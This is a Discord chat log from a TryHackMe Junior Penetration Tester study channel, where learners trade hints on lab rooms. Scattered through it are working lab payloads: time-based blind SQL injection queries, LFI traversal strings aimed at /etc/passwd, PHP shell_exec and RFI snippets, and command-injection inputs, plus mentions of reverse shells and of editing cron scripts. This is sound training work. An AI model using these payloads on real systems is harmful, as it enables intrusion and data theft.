#junior-pentester-path

1 messages ยท Page 14 of 1

reef wave
#

||shell_exec didn't work so I went to a rev shell||

#

damn it I want an oscp voucher :/

drifting drum
#

That's a whole nother can of worms

modest arch
#

Probably was. Infosec peeps don't usually know much about windows for some reason

modest arch
reef wave
#

got a fatal error

drifting drum
modest arch
#

How fast is normal to get through the path?

reef wave
#

||maybe needed using the exec or system||

#

yikes

#

how could I mess this up

#

||<?php shell_exec("hostname"); ?>||

cobalt tundra
#

"What is the odd path in PATH?" linux privexec

#

i just dont get it

reef wave
#

ah

#

don't know if there are oscp vouchers left it's not on the tickets room

drifting drum
#

Then there are none left

hearty quest
#

VkVoTmUxTlRValpmVFVGVFZFVlNmUT09 is this text encoded with something?

drifting drum
#

Dosent look like it to me but idk

cobalt tundra
#

thanks, got it

next lanceBOT
#

Gave +1 Rep to @steel nymph

cobalt tundra
#

and thanks @drifting drum because you were the one writing it :)

drifting drum
#

๐Ÿ˜‚๐Ÿ˜‚

wintry forge
#

god bless you:))

earnest axle
#

Hello every one
I need help to the file inclusion room to Jr penetration penetest
I want a direction for task 8 Q 3

knotty walrus
#

anyone solved the sql injection lab?

earnest axle
#

Yes it work thank you ๐Ÿ‘

next lanceBOT
#

Gave +1 Rep to @steel nymph

earnest axle
#

Thank you bro
I have forget this ๐Ÿ˜†
their hint it was not explicit to solve it

knotty walrus
#

can someone help me with here

upbeat magnet
#

so, you see how it took 5 seconds to respond? that means "sqli_" is part of the name of the database

knotty walrus
#

yeah

#

I find the sqli_ part by trying one by one

#

๐Ÿ˜„

upbeat magnet
#

you just have to add letters/numbers before the % and if you get a 5second wait, that's the correct letter/number

knotty walrus
#

but I cant get more of it

upbeat magnet
#

no other letter after the _ gave you a 5sec wait?

knotty walrus
#

It needs to

#

but i couldnt find it

upbeat magnet
#

hmmm.

knotty walrus
#

Can I DM you?

upbeat magnet
#

sure

prime summit
#

I'm stuck on Lab3 I got the file to be displayed but in the wrong format apparently

modest arch
#

hahahaahh

#

2 oscp voucher tickets.... one more pls?

silk sentinel
#

Hey um if you are lets say saving the results from ffuf to a txt file you just add -o example.txt right?

hearty quest
#

u can do " | tee file.txt "

silk sentinel
vagrant charm
silk sentinel
#

i did use the copy paste command and i checked the ip so i though maybe the -o command was not right or smth

vagrant charm
#

If the .txt was created and the contents of the file look correct to you than it should be all good. A lot of people were struggling with getting task 3 to work though and some found the creating the file manually fixed the issue.

silk sentinel
polar cloak
#

Need some help on SQLi task 8, I have the schema and the table but when it comes down to column name I canโ€™t find anything
Does my query look good,
admin123' UNION SELECT SLEEP(5),2 FROM information_schema.tables WHERE table_schema = 'xxxxx' and TABLE_NAME='xxxxx' and COLUMN_NAME like 'a%';

opal stirrup
#

It's pretty much the same as the prior example

vagrant charm
opal stirrup
#

It's exactly the same steps but you're using the sleep input to validate your inputs

silk sentinel
next lanceBOT
#

Gave +1 Rep to @vagrant charm

vagrant charm
polar cloak
#

I am sure i got the right table but i can't get a single delay in column name

vagrant charm
opal stirrup
#

What is your query right now?

silk sentinel
polar cloak
#

i'll DM you my full query

hexed coral
#

Time Based SQLi is driving me insane

opal stirrup
hexed coral
#

Ive been messing with it...at this point Im lost lol

#

Maybe try again another time

#

I probably should have kept track of what Ive triedkekw

slender kettle
#

can someone help me? i can't come up with an easy solution

Official Vulnerabilities 101 Room Task 4 2 question:
Who is the author of Exploit-DB? i am too stupid to find the answer Y_Y

verbal crypt
#

I hate my life. Got root on a box only for it to immediately go down :(

slender kettle
next lanceBOT
#

Gave +1 Rep to @winter perch

wild bolt
#

Guys I cant find the flags on task 3 (view page source)

#

anyone can help

slender kettle
wild bolt
slender kettle
#

The answer is in the text, if I do not find something I read it again slowly very carefully ^^

golden bane
#

hello guys, my friend never played ctf, if he create an account and do the path of ticket event and give much luck to win the OSCP is valid?, do not want him to waste his time

opal stirrup
#

Bro the OSCP vouchers are gone by now lol

golden bane
#

really ?

#

omg

#

:9

slender kettle
#

OSCP Voucher
Worth $1000 Each
0/2 Claimed ๐Ÿค”

vagrant charm
#

it has to be updated manually so more than likely that is not accurate

slender kettle
#

does anyone already have eJPT vouchers? i have 2 flagen i am only missing one X-X

drifting drum
#

Yea. Really good chance that everything has been claimed already

slender kettle
#

if it should be so then no chances for the noobs haha

drifting drum
#

Yep pretty much

slender kettle
#

and if not then i hope i get my 3 ticket

opal stirrup
#

Probably shouldn't be doing OSCP anytime soon in that case anyways lol

slender kettle
#

i got my 2 ticket yesterday at 1 or 2 in the morning

#

if the price would no longer exist i think yes i would not have gotten it

#

yes i thought so too but if you need it you save money

opal stirrup
#

Yeah same and then I realized the more savvy folk already sniped em

prime lava
#

can any help me i'm at SSRF example task2

drifting drum
#

You're gonna need to give more info than that

drifting drum
prime lava
prime summit
#

@drifting drum ||sometimes just hiding in plain sight ||

rancid bone
#

Can someone help me ? Please SSRF ROOM Task 2

modest arch
#

What user is this application running as? (OS Command Injection). Need help to find this

reef wave
modest arch
modest arch
vital crag
#

i too stuck in there

modest arch
vital crag
#

anyone?

modest arch
#

I am also waiting for help

prime summit
#

I'm trying to get the flag2 for the playground lab using the admin cookie but need help on additional cmds---got it ๐Ÿค˜

balmy tinsel
#

Netsec challenge at Port 8080 not working... Can anybody tell me what j am missing๐Ÿค” I tried stealth scan with t5

modest arch
#

What are the contents of the flag located in /home/tryhackme/flag.txt? (Command Injection). Need help to find this

quick light
#

file inclusion task 8 flag 1 and 3 help needed please

modest arch
balmy tinsel
rancid bone
#

i am trying to connect telnet i am getting this error need help please.

balmy tinsel
reef wave
#

any help on sqli task 8?
I'm on level 4 trying to run the command the give however it doesn't sleep.

#

||referrer=admin123' UNION SELECT SLEEP(5),2 where database() like 'u%';--||

modest arch
reef wave
balmy tinsel
reef wave
#

ok I got it tnx

quick light
balmy tinsel
#

Ngl, I am not a noob... But there's a ton lot of shit I learnt from this path ๐Ÿ’ฏ๐Ÿ’ฏ๐Ÿ’ฏ๐Ÿ”ฅ๐Ÿ”ฅ

reef wave
#

btw how do I get the subscriber role?

balmy tinsel
#

Subscribe to thm on site... The bot updates ur role here

reef wave
#

I am subscribed

#

and my levels haven't updated

modest arch
#

Run the discord bot verification again

#

It will update

reef wave
#

cool

balmy tinsel
#

Can anybody help me with net sec challenge 8080 it seems buggy it's not running๐Ÿ˜ญ๐Ÿ˜ญ even on attackbox.been on this for like an hour now

balmy tinsel
#

Nmap

modest arch
balmy tinsel
#

sudo nmap -sS -T5 -vv ip

modest arch
#

One issue here is that you are running with T5 which can miss ports because it is running too fast. try :

nmap -sC -sV {IP} (This will run on top 1000ports and use default scripts and enumerate versions)

Then try with -p- (This will do all ports {WILL TAKE TIME})

shadow echo
balmy tinsel
#

Ok I'll look into it ๐Ÿ’ฏ

balmy tinsel
modest arch
balmy tinsel
#

Yess

modest arch
#

get remove -vv and -T5

#

Speed = more noise

balmy tinsel
#

Now it's 70%

#

84

modest arch
#

Are you just running -sS?

#

The scan should only run for 1-2 seconds

modest arch
balmy tinsel
modest arch
#

Only add that flag

balmy tinsel
#

Lol back to 100%

#

Command: nmap -sS ip

#

I even used --scanflags option... It got no change

modest arch
#

How long is your scan taking to run and are you resetting the tester?

balmy tinsel
#

13.35 seconds

modest arch
#

This is the capstone one right? I'm going to boot it up

balmy tinsel
#

Yess

#

Thx so much ๐Ÿ’ฏ

hazy hinge
#

Getting the flag by hacking the course code and using cyberchef to decode the base64 is technically not cheating as it its still a leart hack right? hahaha

unborn quail
#

Guys any help with lfi task 8

#

Im stuck in here

#

I tried burp to modify request but nothing happend

glad anchor
#

hello need some help
on xss task 8
i dont know what to do

modest arch
glad anchor
#

i have started nc listner
and created 1 ticket as shown in guide
but i downt know how to send request to Request Catcher

modest arch
glad anchor
tight vortex
#

Guys , iam literally pulling my hair off because of this shitty task, i've tried every single technique with cronjobs (I've never faced problem while doing other machines with cronjobs) So what's wrong ?

modest arch
glad anchor
modest arch
modest arch
tight vortex
#

I know it is straight forward, i've edited the script which is located at |/home/karen| to a simple reverse shell, and open a listener on my machine for nearly 10 mins but nothing appears

modest arch
glad anchor
tight vortex
modest arch
modest arch
#

If nothing works, try the attackbox

tight vortex
#

First it was not (i've never made it executable though) then i thought of making it executable but nothing works, people in the forum post suffers form the same problem

#

I'll give it one last try

glad anchor
glad anchor
next lanceBOT
#

Gave +1 Rep to @fleet horizon

unborn quail
#

Guys please help me on fileinc task8 please

#

Im stuck on flag2

modest arch
#

Stuck on fileinc as a whole

#

been trying anything I can think of

#

any hints would be appreciated

unborn quail
#

Im stuck on last task

#

Dm if I'm any of use

modest arch
#

Im stuck on forth if you could help

glad anchor
#

4th one is easy
follow task 6 for last one

modest arch
#

pretty sure i worked it out

#

got it :)

#

Hi

#

I ma stuck at file inclusion task 4 questions 1

#

I can read the file

#

But I can't get the url format to answer

#

|| Developer tools will help ||

#

Hint in that box

#

The question is lab#1 try to read /etc/passwd .what would the request url be

#

I can't figure out the url

#

Look in the spoiler I gave you

#

Gives the hint on the way I atleast got the request url

#

Probably a better way from other people

#

@modest arch Have you managed to work it out

#

Nope

#

I can read the file

#

Have you read the hint I gave to you

#

Ya

#

Dms

hazy hinge
#

Still ah issue with Cross-site Scripting Practical Example (Blind XSS) task 8 as i am getting nothing from the cookies and been on it for about 90 minutes now ๐Ÿ˜ฆ

coarse marsh
wicked fulcrum
#

File Inclusion room. Task 8 for flag3.

Somebody just give a hint.

#

a hint would be very helpful.

distant mica
#

@wicked fulcrum just try another http method that start with P ๐Ÿ™‚

wicked fulcrum
#

alright. I will try that,.

cold iris
#

Does anyone know why File inclusion Challenge 1|| only works with curl? I've tried everything else and can't figure out why it only work like that.||

distant mica
wicked fulcrum
#

hey it worked. Thanks @distant mica ๐Ÿ˜๐Ÿ˜

next lanceBOT
#

Gave +1 Rep to @distant mica

modest arch
#

Can i get a hint for task 8 in File Inclusion

distant mica
distant mica
modest arch
#

First one

#

Kinda confused on how to start

distant mica
#

There a hint on the page ๐Ÿ˜„ : You need to send POST request with file parameter!

modest arch
#

so use curl

distant mica
#

yes I think it's the simple way

rough tusk
#

Hi,
in the room Walking An Application, when i visit the URL : https://LAB_WEB_URL.p.thmlabs.com.
I've this error : 504 Gateway Time-out

I don't understand why. I already managed to go to the site but I turned off the box without doing so on purpose.

rough tusk
distant mica
#

If you don't use a vpn go with attack box and then machine yes

rough tusk
#

ok thanks

modest arch
#

I feel stupid for not being able to do these challanges

#

Gonna take a break and come back with a fresh mind to see if that helps

reef wave
#

do u think the ejpt is good?

prime sundial
modest arch
# prime sundial No, have you seen any jobs requiring it?

That doesn't mean it's not good. It's a solid cert if you have no foundations in pentesting. You don't have to get the cert itself (you can if you have $200 spare though). There is some things that are outdated but combining that course with Tryhackme, HTB and other learning sites, should allow you to go for something more useful like the eCPPT or OSCP

modest arch
glad anchor
next lanceBOT
#

Gave +1 Rep to @fleet horizon

uncut spade
#

Hey all, heads up I'm kind of a noob and doing the Remote File Inclusion lab on Jr Pentest path and I'm trying to serve up a simple Python3 http.server but for some reason it's stuck on "Serving HTTP on 0.0.0.0 port 9001 ..." any advice? Looking on the internet and it seems like I may need to port forward on my router?

modest arch
uncut spade
next lanceBOT
#

Gave +1 Rep to @fleet horizon

modest arch
uncut spade
modest arch
#

anybody completed file inclusion room?

#

I need help badly

#

@prime sundial still typing

#

I am stuck in task 5 first question

#

I could access /etc/passwd but the answer I put for the response shows wrong

#

/lab3.languages../../../../../etc/passwd%00

#

this is what I tried

deft valley
#

try to put other numbers and check how ur url should be

prime sundial
modest arch
#

well I did this to match the answer format

#

?file=languages/../../../../../etc/passwd%00

#

Lemme try sth ....I will reach u again if I can't still answer

reef wave
# modest arch ^

thanks, actually I'm not sure if I want the certs for a job but mainly for intrest

next lanceBOT
#

Gave +1 Rep to @fleet horizon

reef wave
#

I was thinking about maybe oscp

uncut spade
prime sundial
reef wave
#

I start to investigate other fields that are not software engineering

modest arch
# reef wave I was thinking about maybe oscp

If you decide to go that route, make sure you can put a lot of time it. It's definitely no joke and will take lots of time to study for it. Utilise the resources that are out there and you should be able to do it. If you are completely new, I would recommend 90days

reef wave
#

thats why for now I got this paths

buoyant tiger
#

anybody could give a nudge for LFI Chall3 please ? ||I absolutely tried almost all kinds of characters escape but couldn't get any single / or even a number||

reef wave
#

trying if this is really fits for me

modest arch
reef wave
#

I read that the oscp is like entry that you need to have

buoyant tiger
#

can i DM you ?

reef wave
#

however I haven't find anything after (well maybe CRTO) for red teaming but not a solid like oscp

prime sundial
junior kestrel
#

Am I the only one having an issue with the last flag in Walking an Application?

#

or am i missing something

#

doesn't seem to accept it

#

oh nvm i missed something

deft valley
#

anyone can help with LFI challenges?

#

yeah, im reviewing other people's hints, challenge 2, im trying to change cookie value other than admin, like ../../../etc/flag2

#

but im not sure if its the real path, or what is the directory i have to look for?

#

ok

#

let me try again more

prime sundial
deft valley
#

i changed in developers mode METHOD to POST and put IP/challenges/chall1.php?file=../../../../etc/flag1

#

still seems not working

#

am i missing smth? i tried with burp, but didnt work aswell

prime sundial
midnight maple
#

omg sqlinjection task 8 took me forever haha

deft valley
modest arch
#

@steel nymph am still stuck : |

#

then what should be there

tiny brook
#

Hey! Has anyone completed the SQL Injection Room?

midnight maple
#

lol

modest arch
#

FINALLY DID IT

tiny brook
#

Need some help with the same, Should I DM you?

modest arch
#

CAN'T THANK YOU ENOUGH @steel nymph

next lanceBOT
#

Gave +1 Rep to @steel nymph

midnight maple
rough tusk
#

i've the same problem and i take away the curly braces, but it doesn't work

prime sundial
rough tusk
#

yes I think so, it puts me on an endless list of words

pearl bolt
#

has anyone found a work around for the net sec ids bypass thing?

#

it stays on 0% but nothing happens

#

I've run a variety of scans..attackbox and local..

rough tusk
pearl bolt
#

when it's over 0%?

#

like...naturally? or because of scans?

#

wow

#

thanks @steel nymph it worked

next lanceBOT
#

Gave +1 Rep to @steel nymph

pearl bolt
#

refreshing seems to have made all the difference

rough tusk
#

the command is :

user@machine$ ffuf -w 
/usr/share/wordlists/SecLists/Discovery/DNS/namelist.txt -H "Host: FUZZ.acmeitsupport.thm" -u http://MACHINE_IP -fs {size}
pearl bolt
#

I've been flipping out because it wasn't working up til now

#

but now it registered 1% (lmao) and then I ran a scan

#

and right away got flag

#

๐Ÿ˜ฎ

#

same..I was running everything..then everything f..then everything ff...and I thought how much more sneaky can I go for something intended to be a 5m exercise?

rough tusk
#

i restart the machine, I must have made a mistake somewhere

tiny brook
#

I am stuck with the SQL Injection room. They payload provided in the lab is also not working.

pearl bolt
#

is this early on bc I had a similar issue

rough tusk
#

i lost the url of the site acmeitsupport ><

deft valley
rough tusk
deft valley
prime sundial
#

Oh cool, thanks Iassi was wondering how to do that, saves a google search

next lanceBOT
#

Gave +1 Rep to @steel nymph

unborn quail
#

Guys i need help with ssrf task 2

#

I cant figure the payload

#

Please help

royal mulch
#

for winPriEsc:Unquoted Service Path Lab : to search i am using "findstr /si THM flag*.txt" but its not revealing any file name... any help...

#

from c:\

marsh agate
#

Hello. I'm a little confused.
Which TCP ping scan does not require a privileged account? Is a SYN, ACK and what? blobhuh

deft valley
#

can i dm you?

royal mulch
midnight maple
royal mulch
#

๐Ÿ˜‰ i am on it...

wanton prism
#

I am doing the cross site scripting task 3 Where in an URL is a good place to test for reflected XSS? I have tried a few different answers. I feel like this should be obvious but im not getting it. help?

marsh agate
#

Thanks. I'll take a look now

next lanceBOT
#

Gave +1 Rep to @steel nymph

royal mulch
#

have it now... thanks...

modest arch
wanton prism
next lanceBOT
#

Gave +1 Rep to @dull turtle

marsh agate
#

No way. I can't understand the format of the response.. Expected -PS or SYN. And everything is wrong... May i ask you for help?

deft valley
#

which one

#

1 or 3?\

#

give me some time to try

marsh agate
#

-PS/PA/PU/PY[portlist]: TCP SYN/ACK, UDP or SCTP discovery to given ports
-PE/PP/PM: ICMP echo, timestamp, and netmask request discovery probes. In the documentation, these are all ping options. I don't see a four-character one among them..

#

Nmap Host Discovery Using TCP and UDP

#

in Nmap Live Host Discovery

modest arch
#

I was using burp suite for getting flag1 from task8 of inclusion room

#

And this is how my input looks:

#

POST /challenges/chall1.php?file=/etc/flag1 HTTP/1.1

Host: 10.10.147.130

User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/;q=0.8

Accept-Language: en-US,en;q=0.5

Accept-Encoding: gzip, deflate

Connection: close

Referer: http://10.10.147.130/challenges/chall1.php

Upgrade-Insecure-Requests: 1

DNT: 1

Sec-GPC: 1

marsh agate
#

omg. im so stupid

modest arch
marsh agate
#

This is a language barrier... Thank you for responding and not passing by my request. ๐Ÿ˜€

next lanceBOT
#

Gave +1 Rep to @steel nymph

modest arch
#

@hard jungle u there?

#

damn

#

has the site for the last task in XSS bugged out?

#

Can I get a hint on how to start going about question 1 Task 8 in File Inclusion

deft valley
#

thanks

next lanceBOT
#

Gave +1 Rep to @steel nymph

modest arch
#

Gonna read task 6 and 7 again to see if that helps any

civic fog
#

Yo, I can not get my head around the SSRF room. Anybody mind giving me the example string in task two so I can have an example of how the request is parsed?

prime sundial
modest arch
#

Linux PrivEsc - 'what linux is this?' wow I cant find what i need in the required format. Any tips please?

#

hey hi i'm looking for help for the FILE inclusion challenge

#

marvellous, permission denied

nimble turtle
modest arch
#

i'm stuck in the second e third challenge

nimble turtle
#

can i dm you @steel nymph

modest arch
#

thank you!

next lanceBOT
#

Gave +1 Rep to @steel nymph

junior island
#

hey guys im stuck at LFI lab, im pretty sure my request is correct but am not getting the right response

modest arch
#

and for the rce task on file inclusion, I got a python webserver up, with the file im trying to reach on it, but it cant connect

junior island
#

first one its not working

#

the server doesnt give any responses

modest arch
#

For task 4 right

junior island
#

for task 8 the challenge

modest arch
#

What question

deft valley
modest arch
#

^

junior island
#

am using burp

marsh agate
junior island
#

can i pm someone

modest arch
#

@marsh agate Can you give me a hint for the challenge rce one

#

I got the file and a python webserver up

#

But I can't get the response on the site what i need

#

no errors on the my python server

#

just on the playgrounds site

#

tried nulling it at the end aswell

opal stirrup
#

are you on a VPN or using a THM box

modest arch
#

thm box

deft valley
modest arch
#

That's what im trying

deft valley
#

what do u host in ur directory of server runnning?

#

what file

modest arch
#

I have it running in home, and have cmd.txt as the payload

#

Through playground site, I enter the webserver of the payload and its directory

#

But i just get can't connect to webserver, failed to open stream and cant open cmd.txt

#

OH

#

i've been doing 0.0.0.0

marsh agate
modest arch
#

that explains it

marsh agate
modest arch
#

It's fine

noble rose
#

Can someone link me to a reverse shell for the playground please? DM me or just mention me here so i can see it, thank you in advance

hard jungle
grave crater
#

Hi!
In Windows Privesc Room, task 5 dll hijacking, I can't stop nor restart the service, also it seems that my dll can't manage to change the admin pwd, any tips?

modest arch
#

I feel stupid for not being able to do this simple RCE

opal stirrup
#

what is your payload

#

what's your query to the site as well

modest arch
opal stirrup
#

your cmd.txt only has hostname in it?

#

it needs to be PHP code

modest arch
#

OH

grave crater
#

I've done that a few times already :S

modest arch
#

Is the query right however

opal stirrup
#

Did you start your HTTP server on port 4932?

modest arch
#

yes

#

I did python3 -m http.server 4932

grave crater
#

Yup

modest arch
#

Fixed the payload and it still isn't working

#

aaa

#

||<?php echo gethostname(); ?>||

#

what is wrong with the payload

#

Okay

south arch
#

Anyone else have an issue on task 8 of cross-site scripting? I get the cookie and decode it, but the room doesn't accept it. Tried putting in everything and just after the =.

modest arch
#

Wait I might know why it didnt work

#

In an error it says about included paths

#

If I add that, then go to the webserver it could work maybe

#

I just realised my mistake after this whole time

coarse marsh
modest arch
#

I was using the wrong ip this whole time lmfao

#

I feel so stupid

coarse marsh
#

did you get the shell?

modest arch
#

You don't need a shell

deft valley
#

any hint on task 2 ssrf? still not working

modest arch
#

Now time to just try get the right php function to call

coarse marsh
old pike
deft valley
#

yes

deft valley
modest arch
#

I GOT IT

#

I GOT THE FLAG

#

Gain RCE in Lab #Playground /playground.php with RFI to execute the hostname command. What is the output?

#

Any clues?

#

idk where to start

#

Clue research how to get hostname in php

#

Task 6 information helps ALOT

#

Also lassi, has attackbox been a kinda laggy for you the last few days>

round kettle
#

@modest arch hi, i'm stuck too

modest arch
#

Alright

#

Might try use a vm then

round kettle
#

i seem like cronjob are not working

wanton prism
#

I am on common injection task 5 practical. Do the inputs that I would do to get the user and flag go in the diagnose IT page or in a terminal session?

#

ok i'll try that

old pike
#

Thank your very much sir ๐Ÿ˜‰

next lanceBOT
#

Gave +1 Rep to @steel nymph

wanton prism
#

will it show an output or do I need to look at the source to see the output. I have been trying some inputs and the output field has been blank

round kettle
#

of course, thanks

next lanceBOT
#

Gave +1 Rep to @steel nymph

wanton prism
#

I am getting results with the example

south arch
#

Thanks, had some other issues, but got it figured out.

next lanceBOT
#

Gave +1 Rep to @steel nymph

wanton prism
#

Thanks

next lanceBOT
#

Gave +1 Rep to @steel nymph

modest arch
#

Thanks @modest arch

#

don't I get repo

#

: (

coarse marsh
next lanceBOT
#

Gave +1 Rep to @smoky oyster

modest arch
#

oh ye

coarse marsh
#

lol

modest arch
#

thanks @steel nymph for the help

next lanceBOT
#

Gave +1 Rep to @steel nymph

modest arch
#

yes

#

lol thanks @coarse marsh

next lanceBOT
#

Gave +1 Rep to @coarse marsh

full escarp
#

is there like a drop rate list for tickets ? hahahah

lusty bolt
coarse marsh
#

use this script in backup.sh and chmod +x and wait

#

it will work

#

does it have root privs??

#

yeah

#

just do it with backup

modest arch
#

u there @modest arch

#

ye

#

antivirus will work

#

im here

#

you just need to change permissions

modest arch
#

no output : (

#

Change the permissions

#

Have you got a web server going

#

of my own?

#

ye]

#

nope

modest arch
# modest arch

Have you tried reading the file of where that information may be stored?

#

Spin up a python webserver

#

python3 -m http.server

next lanceBOT
#

Gave +1 Rep to @fleet horizon

modest arch
#

If you want we can go dms where I can explain it better

modest arch
#

Incase people who read the chat don't want hints

modest arch
rapid kite
#

Hi im having trouble accessing the xssgi url that is given to me

#

saying there's a potential security thread and i can't proceed from there..

#

would anyone be okay to direct me from there

#

from the blind XSS practical

#

if i use just http(without secure), gives me a ngnix page

#

nginx*

modest arch
#

You can accept the warning

rapid kite
modest arch
#

It's just because it doesn't have a valid cert

modest arch
rapid kite
#

@steel nymph Yup ! I'm using the attackbox

rapid kite
next lanceBOT
#

Gave +1 Rep to @fleet horizon

full escarp
#

am i the only one getting this

rapid kite
#

@steel nymph @modest arch Ah. only using the machine IP works. Thanks again!

modest arch
wanton prism
#

Im doing SQL injection task 6, I was able to get the flag but it doesnt seem to be working, is this not the right flag? ||THM{SQL_INJECTION_3840}||

cold iris
#

File Inclusion Playground had me stressed NotLikeThis but i made it through

modest arch
plush widget
#

Anyone found the username for task 8?

#

I canโ€™t seem to get the first character

modest arch
#

which room?

plush widget
#

SQL injection

drifting drum
plush widget
#

Referrer=admin123โ€™ union select sleep(5),2 from analytics where username like โ€˜a%โ€™;โ€”

upper field
plush widget
#

Oh

drifting drum
upper field
lusty bolt
#

you have to change the cookie value twice in total to get the flag

plush widget
deft valley
upper field
#

is that the correct url i was using then?

lusty bolt
#

no

modest arch
drifting drum
#

That too lol

upper field
#

im so confused, the cookies is set to Admin, i thought i got that part right

lusty bolt
#

try changing the cookie and read the error

deft valley
upper field
#

lol im fully lost

#

just tried changing flag to etc/flag2

lusty bolt
#

think about where else you could put a file path instead of the parameter in the URL

upper field
#

i see its changing the include file

plush widget
#

Anything special?

modest arch
plush widget
#

I enumerated the two Colomns

#

Now Iโ€™m trying to guess the admin password

#

But I tried all alphanumerics

modest arch
plush widget
#

Yes

modest arch
#

What command are you running?

keen dome
#

Ah same one im struggling with

#

Task 8

#

Its a fucking bitch

plush widget
#

โ€ฆ. From users where username = โ€œxxxxxโ€ and password like โ€˜%โ€™;โ€” works

#

Takes 5 seconds

#

But anything else is instant

upper field
#

This is pissing me off so much ๐Ÿ˜†

modest arch
#

That is because that payload is wrong

#

You need to enumerate the username first

#

Do you have one?

plush widget
#

I did

modest arch
#

Ok... have you tried all numbers too?

plush widget
#

I didnโ€™t write it so not to ruin it for others

#

Yes

#

0-9

#

Oh wait

#

I think I skipped one lol

lusty bolt
modest arch
#

I thought so..

#

It should work without issues

upper field
#

i started again, so changed the cookie to admin

#

now on the page that says This is a admin web page! Get the flag!

lusty bolt
#

yep, good

#

now keep modifying the cookie

#

you're very nearly there

upper field
#

do i need to do anything with the url or just the cookies ?

lusty bolt
#

only cookies

upper field
#

whaaat the heck

#

okay

lusty bolt
#

change the cookie to something else and read the error

upper field
#

tried:
etc/
/etc
etc/flag2
/flag2
cat /etc/flag2

lusty bolt
#

you still need to use directory traversal

royal hull
#

someone has a hint for me in challange 3 in the LFI room

plush widget
#

Is it case sensitive?

modest arch
#

Unless you have the wrong user

royal hull
#

in the inclusion function i dont get rid of the .php and i tried it with the %00 and 0x00

#

i think so yes

plush widget
royal hull
#

yes when i use the GET i get in the inclusion function ectflag.php and with POST there is the .php

deft valley
quasi rampart
#

Lol I did the same mistake yesterday ๐Ÿ˜ƒ I struggle with the whole ssrf module...

deft valley
royal hull
#

im using burps repeater at the moment but not sure if this is the problem

upper field
#

@lusty bolt Got it !!! god that was stressing me out

#

thank you!

lusty bolt
#

Nice!

glad anchor
#

How to get sqli task 8 time based flag?

lusty bolt
#

no rep for me :(

modest arch
#

thanks @lusty bolt

#

ok no rep for you officially

lusty bolt
#

it's because you edited it

modest arch
#

thanks @lusty bolt

next lanceBOT
#

Gave +1 Rep to @lusty bolt

upper field
#

how do you give reps ?

modest arch
#

by thanking others

lusty bolt
#

you just say thanks and ping someone or reply

#

I think

upper field
#

thanks @lusty bolt

next lanceBOT
#

Gave +1 Rep to @lusty bolt

upper field
#

boom

next lanceBOT
#

Gave +1 Rep to @lusty bolt

glad anchor
#

What to repeat?

#

Same as previous task?

#

Ok let me try

sharp knoll
#

Thanks TryHackMe for putting this path up. Learnt a lot. Completed the path but didn't get lucky apart from gaining knowledge. For that I am thankful.

next lanceBOT
#

Gave +1 Rep to @sharp knoll

mellow marsh
#

anyone can help with flag2 from LFI? I already changed the cookies value but I have no clue what to do next

modest arch
#

i must say SSRF is not my strong point that took me a while!

quasi rampart
mellow marsh
ornate yarrow
#

then catch it with Burp, and change the "Cookie" value to path

mellow marsh
next lanceBOT
#

Gave +1 Rep to @ornate yarrow

ornate yarrow
wary osprey
ornate yarrow
#

but I'm not a web app fan or File inclusion fanboy

#

use NullByte and ../../../../etc/flag in Burp

#

can anyone help me with the Cross-Site Scripting listening problem. I couldn't catch the target.

wary osprey
ornate yarrow
#

when you change request method in Burp you'll see the line, I think

wary osprey
ornate yarrow
#

try again, I must say. I got the code that way

ornate yarrow
winter spade
#

Hi, on Authentication Bypass > Task 3 (Brute Force), I have the correct valid_usernames.txt file from Task 2, used the clipboard to paste the command over for accuracy, and got no output in the terminal. I also tried to >> output.txt and confirmed that it's a blank file. Same happens if I update valid_usernames.txt to 4 lines of usernames, with one on each line. Is there perhaps an issue with the command itself that I'm missing?

upper field
#

<?php
echo gethostname();
?>

Am i on the right track with this for the cmd.txt

opal stirrup
#

You only want the actual usernames itself

deft valley
wary osprey
deft valley
winter spade
opal stirrup
#

Ah sorry, I thought you meant it like as shown in your screenshot

#

Uhh let me take a look at that room again

deft valley
wary osprey
deft valley
#

i did with curl and dev tools

unreal folio
#

For etc/flag3 is there anyway to strip the .php out when using curl?

wintry forge
#

yo is there a bug on Cross-site Scripting room? i don t get the request neither by using curl nor by using thm request catcher

upbeat magnet
#

look up what null bytes are

unreal folio
#

I tried %09 and .

#

%00

opal stirrup
wintry forge
#

i see

#

thanks

winter spade
unreal folio
#

Omg I got it

deft valley
#

but u can also use one command to stop and show when it ends with correct answer

jolly vine
#

@winter spade I had the same issue. If you used the output redirector (>) for your ffuf command, and put it into valid_usernames.txt you have to completely delete the file and throw the names in the file, one name on each line.

wary osprey
#

I sent it as a post, tried with different payloads, url encoded, etc.

wintry forge
# wary osprey Use the thm req.catcher

I tried that a few times now, so I m pretty sure i do something wrong or the room is not working properly. It s more likely to be the first one tbh but still

rapid kite
#

anyone doing command injection ?.

unreal folio
#

I used --output success.txt with a curl POST and the -d specifying the file

winter spade
next lanceBOT
#

Gave +1 Rep to @jolly vine

unreal folio
#

@wary osprey what is your curl? Let's see

wary osprey
ornate yarrow
unreal folio
#

Ohhh I don't have burp.

jolly vine
rapid kite
#

hi anyone able to do command injection last task??

unreal folio
#

@wary osprey if you look up in this thread there's the curl command that you can use from your attacker code line

rapid kite
#

just following the payload cheatsheet. how do we know which is to output the flag.txt actually?

unreal folio
#

Command line

upper field
#

thanks @modest arch !!

next lanceBOT
#

Gave +1 Rep to @covert nebula

wary osprey
next lanceBOT
#

Gave +1 Rep to @unreal folio

unreal folio
#

Yay! Welcome

rapid kite
#

don't get what you mean by 'what does the input do'

#

you mean like cat etc input?

#

searches the ip machine for whatever input i enter?

#

yup, i mean, i know they are commands.

#

alrighty! Thanks @steel nymph !

next lanceBOT
#

Gave +1 Rep to @steel nymph

rapid kite
#

I did ' | cd $HOME && ls ' managed to see some files/directories

#

can't seem to find the tryhackme folder . still trying to dig around

#

But thanks for the direction. this is fun hahahaha

next lanceBOT
#

Gave +1 Rep to @steel nymph

modest arch
#

can't get the flag : (

#

i did

#

i used |id

#

same payload not working for the flag : )

royal hull
#

@steel nymph thanks it worked with curl on challange 3

next lanceBOT
#

Gave +1 Rep to @steel nymph

pearl compass
#

can anyone help with task 2 of the Authentication Bypass module

modest arch
remote estuary
#

someone have a problem with protocols and server 2 task 6?

deft valley
rapid kite
#

@steel nymph Just a curious question, are we able to download files using command injection as well?

#

verbose injection for that matter

remote estuary
#

my hydra or potator didn't work

modest arch
#

no idea

modest arch
rapid kite
#

holy cow that's sick.

deft valley
# modest arch & where

